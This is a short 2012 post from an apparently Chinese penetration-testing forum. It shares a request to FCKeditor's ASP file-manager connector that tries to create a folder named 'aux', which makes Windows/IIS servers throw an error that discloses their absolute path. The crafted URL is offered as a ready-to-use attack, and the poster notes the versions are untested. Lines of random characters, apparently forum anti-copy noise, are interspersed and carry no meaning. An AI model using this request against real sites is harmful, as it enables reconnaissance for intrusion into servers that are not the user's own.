中国网络渗透测试联盟
标题:
最新FCKeditor爆绝对路径漏洞
[打印本页]
作者:
admin
时间:
2012-11-21 13:39
标题:
最新FCKeditor爆绝对路径漏洞
代码:FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=%2F&NewFolderName=aux
& P3 _1 w: ~2 K7 o( l, O8 v
1 T% Y; L' \+ E% s9 p
% h) C# Q2 W7 s$ H+ ?4 c5 b: z
版本未测试。。。
2 E- e% l5 s- K3 N6 a; c) F! {/ ]: i
4 v% @1 i2 K& {. L/ R
原理:新建个aux文件夹,aux在windows系统不支持,所以会报错,爆出绝对路径,这个比较鸡肋。求大神别喷。。。
3 Y3 ?! I- H0 V( P+ G( @
. J; Z( J/ [3 [
- {# H! \( [- E9 e0 k/ I% R& k. t
听说IIS都可以。。
& z; g" `0 N" F# G9 E1 Z+ p, Z
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2